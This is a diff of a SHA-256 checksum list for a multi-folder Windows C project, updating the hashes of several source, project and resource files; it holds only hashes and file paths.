+691f137f1ce6a476d1bc9d8cdc1c6b3ad977d888824ce1b9bed356e94ea4d8fb *Source\Hibiki\Hibiki.vcxproj
eaf764a71dca55552f81e54f864acf78bb081b8d42de8cfcf67c69347a297809 *Source\Hibiki\Hibiki.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Hibiki\Hibiki.vcxproj.user
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Hibiki\resource.h
-2445782239ea27dce10bca969eff59bb279b963b05c95e5b47d8634f86c0da03 *Source\Hibiki\version.rc
-3e987580133daa652cfb7639c83d852b004400a8beff5f6abf6ec0d0b824c29c *Source\Ikazuchi\dllmain.c
+4dfa74d554b7be0eb26c1d08232401bd33ffca0e5a619bcd209d4839425f7b3e *Source\Hibiki\version.rc
+e04bfbf94d1d78162e3960022f0b3583433354ef3a56d7b2786da35178af7c0a *Source\Ikazuchi\dllmain.c
14e64356e031e0c1d161f38d4ba8f1e6d55d6ea383c1b967123db80da2f172c2 *Source\Ikazuchi\export.def
-71808e6ef3af9c0fa3173d1c01aad2f4c2ed20024e6bd068631796949966f1fc *Source\Ikazuchi\Ikazuchi.vcxproj
+b34657273d28a94323579208865216135b219ec9d63a4ae15047a3fd529e7b95 *Source\Ikazuchi\Ikazuchi.vcxproj
d196af9df08cbdaff3817f0e56bb356ae21e1dcbc6853482f14fd555e98aebb2 *Source\Ikazuchi\Ikazuchi.vcxproj.filters
+9a4b0023e443b33d85280eedb510864c42b4146c8e6e5f742444b3eff0aae55f *Source\Ikazuchi\Ikazuchi.vcxproj.user
4006ba7005ca2873a5acbd2755ba1965e62bf0bd8783882f874bea2c80d45e1d *Source\Ikazuchi\resource.h
-0b180f5168abbb6fa6754931ab3de21f0fdc964615a591a4154040a745a328b8 *Source\Ikazuchi\version.rc
-851c5fb0f9333d779542def40e124021fd84e1ab56075a5a0da64b33abe5f892 *Source\Inazuma\Inazuma.vcxproj
+c3191014030e36944c1e43d73369df8093cead1b1bf730975dc43abe9fb5ad87 *Source\Ikazuchi\version.rc
+82868f43880065610efe2dc0532876384b3f04d57a17a6f95d5fd71784cfa2db *Source\Inazuma\Inazuma.vcxproj
0cd995b29fdec206817ef1939ac1b9c1a10bc87fff80490f030097a8a0e07c49 *Source\Inazuma\Inazuma.vcxproj.filters
cb5688faa7cfe99a609ecdb7131f218628dbe34b8fb39ba83a2328227bc63179 *Source\Inazuma\Inazuma.vcxproj.user
-602a920e9d044190055552068bf5e6cc97589988bf7294882e77b2b84fb0e380 *Source\Inazuma\main.c
+fc35222348ffb1c055cb1e8153d15d6c11667f5073ad2f9a821ee090ab8294b1 *Source\Inazuma\main.c
6f2113fc347bee7d74be4f51732f1f182956ba172a6fa34eed9a5aa9e10d9f41 *Source\Kongou\Kongou32.dll
f3fb336afb735d40932918b52c2e8660861be9693c2911a1534b70d29a622826 *Source\Kongou\Kongou64.dll
-9d5b86807c7ad8b954b4bc9ade511e57ccfc71854d228f48fb4bfd6ae9f2235f *Source\Naka\main.c
-4463b699dbad298e546848003f78308dc056267c6628f72485571f08da08826e *Source\Naka\Naka.vcxproj
+3aa5f39feacabfdbf5c82fcbf523514804cc15d1bcf54f1fc9464d53014efd05 *Source\Naka\main.c
+5ded12baf68520e2176fa5d61dfb22295adb6b12e4cb31f57434b2df05bfd8c8 *Source\Naka\Naka.vcxproj
4eb5cb6614af01ec00f9e01c016484880cffb41e65790ae9924639935752b31d *Source\Naka\Naka.vcxproj.filters
abd562aa6b8721caf958b4f87b67787a82ab81b64df21c46df01f67891c37ce7 *Source\Naka\Naka.vcxproj.user
893b90b942372928009bad64f166c7018701497e4f7cd1753cdc44f76da06707 *Source\Shared\cmdline.c
bd6fe82852c4fcdfab559defa33ea394b752a4e4a5ac0653ae20c4a94b0175ed *Source\Shared\cmdline.h
107245437ed86b6f1e839b2d3d9bbadb3d9980046cb5c7001f985fed3627962f *Source\Shared\minirtl.h
-db0e164fc1f567f1759603df36a0e44ebb728281fd1aa95977c3d575db58c34c *Source\Shared\ntos.h
+009c1782cdeb0bffa9fd98ea42d74e3f5a050ea159f4c78d8252eb86d60febf2 *Source\Shared\ntos.h
3fccfae61f8e59435c180be88cb46967361ed61ec1314532dddabf12679902b1 *Source\Shared\ntsxs.h
b9de99d3447bb1a125cb92aa1b3f9b56a59522436f1a1a97f23aac9cee90341c *Source\Shared\rtltypes.h
ca0b7a38be2f3f63a69aca6da7b3a62a59fcefee92de00e9796f68d4a2a23158 *Source\Shared\strtoi.c
@@ -103,13 +106,13 @@ ef1b18997ea473ac8d516ef60efc64b9175418b8f078e088d783fdaef2544969 *Source\Shared\
87cc72bb8e3f1534bee09ee278ecd928d975ebb94aeffc767b67249815a0bf3a *Source\Shared\_strncmpi.c
0434d69daa20fbf87d829ffc17e43dcc2db3386aff434af888011fdec2f645a4 *Source\Shared\_strncpy.c
52a696ae714eb81033c477d1ec6c01389eef56c847609e89d360c2fb6899b4b6 *Source\Shared\_strstri.c
-f757bdc4baf67493591a14d11aef2adaa32690376fc34b698627aec63b156539 *Source\Yuubari\appinfo.c
+24432117a04e33dfb64e6defc8fcfc7f1298dde6bde8231d667bd9c9879e5755 *Source\Yuubari\appinfo.c
241814ee27790e05e3e3e3b0555720933175d3202855a9f2efff42b90496a1a1 *Source\Yuubari\appinfo.h
ffd6ad03b61ebb541f76c9ba105a916671f89c8220bf145b4d154943c94e85a9 *Source\Yuubari\basic.c
6cc92c6f21f4a9ad09c05f562404b195b8a7130bf512f39c4a6af6a46b97d6e0 *Source\Yuubari\basic.h
048c8865e9c699c0dbd328983fddefefba5c3bb9f1c0a146d7e4e42aa7dac2a1 *Source\Yuubari\comobj.c
9386b37510b8ea6c681d16b8a308d4e1fb0a030ed174cdd0899683a2e88d44ed *Source\Yuubari\comobj.h
-1fb49d3f7ab0acecdc247bf0d9154a5ec37b539d4db0ed4d6a620af6f5220ad1 *Source\Yuubari\consts.h
+9ddb6961b858c7841c00da8924f3daa705032305873c5ff24bdeab8f7a5be4df *Source\Yuubari\consts.h
a63a54a211965f6107afdb1901e781ca16cfb4fa6fa9acbf0b24775ab7cbfd1b *Source\Yuubari\cui.c
2d2891290f7780933347dcbd091bf0a17af6ee52257b5497951ff80567e03f88 *Source\Yuubari\cui.h
6916b415010caa7e0801ea515a722dbff8a3329ffa716977914f5b81a337d0c3 *Source\Yuubari\fusion.c
@@ -117,16 +120,16 @@ a63a54a211965f6107afdb1901e781ca16cfb4fa6fa9acbf0b24775ab7cbfd1b *Source\Yuubari
d8300b2b51d4f179dd2eaa453dafef6da331889a6bff97c281303cc980fc6a67 *Source\Yuubari\global.h
04bd5497fa817f15e3f6d63325c5e20172fde7f4c668d1dfdc35f99b228d3f33 *Source\Yuubari\logger.c
9b9dad8b40daf87f796c91a0538198921acebd13d47515e0e27b18eaad6906f4 *Source\Yuubari\logger.h
-5bd341aff5d0c75429580da5c2f9ec28753e82e3770d5028e243922784738a62 *Source\Yuubari\main.c
-ac3026bf74108f833d3059411f4d21f1146f686329fd2c141cb4883cc1909ae7 *Source\Yuubari\patterns.h
+1fe4b833867d06e3b0d156f0990aa6e83938bcf62da460747286b06e069498a3 *Source\Yuubari\main.c
+321c200b9b4452270e4b66b23d004e421e2767949622ae9a9b3953c402b870e1 *Source\Yuubari\patterns.h
76faa46729e53c1204c1c6f4d51d9a0c2701cca1f7e927249cfb0bce71e60022 *Source\Yuubari\resource.h
-0e6bff106ee03caa9b94dca4542432e6c9d47d22e7f47ebf30a38b2c5bbc1b51 *Source\Yuubari\Resource.rc
+c598f46133f3f8d458b2b45ae9a4f77696403fcd0e4f1a740df161ca824943d5 *Source\Yuubari\Resource.rc
c90af8a79275833683c07bc639005a168ac194ea9203ad5c76c211008a1e8591 *Source\Yuubari\sup.c
80b0d3d17b61d83dd8dda02ce006acfa644d6ec51439454fb8a9485a353a07e5 *Source\Yuubari\sup.h
ab68c022e2fc5a8a3f6d5c1dcff00825ac9c533160983d33e93931573c02d85d *Source\Yuubari\wintrustex.h
d4acf557a541579d5a8992b9514169fc05c40f26144ad8a560d8ef8d0a3cce0e *Source\Yuubari\yuubari.ico
-1f39aa99875efc5db0e4e041657d3c6a9a9bb5de320c53f3a777cfcb29f4c643 *Source\Yuubari\Yuubari.vcxproj
+23b7bff5645fe2c5e928ba1807c561449148c16423d5b4c1d87caa20383f9504 *Source\Yuubari\Yuubari.vcxproj
a23fb5dccb937ee5103c59c6775f3017b97396d43f1399d1a2ada3ce9c8fd82f *Source\Yuubari\Yuubari.vcxproj.filters
86b904f9099ce583f13128e998a7d9f1f48682354b12c778a23615c361c44425 *Source\Yuubari\Yuubari.vcxproj.user
-3cf272ba16777722e4c9920655ee501ccfafa84538af835e6c3a3f972aa70a7c *Source\Yuubari\tests\test_fusion.c
+7b670598687782b8ef5ff7a95b54118dc5a4743a88c28100878e9855d6a2c250 *Source\Yuubari\tests\test_fusion.c
8f25cacb678c008ff3f205dc9d66f4411902b867df8656ea758c0c6d2141e18f *Source\Yuubari\tests\test_fusion.h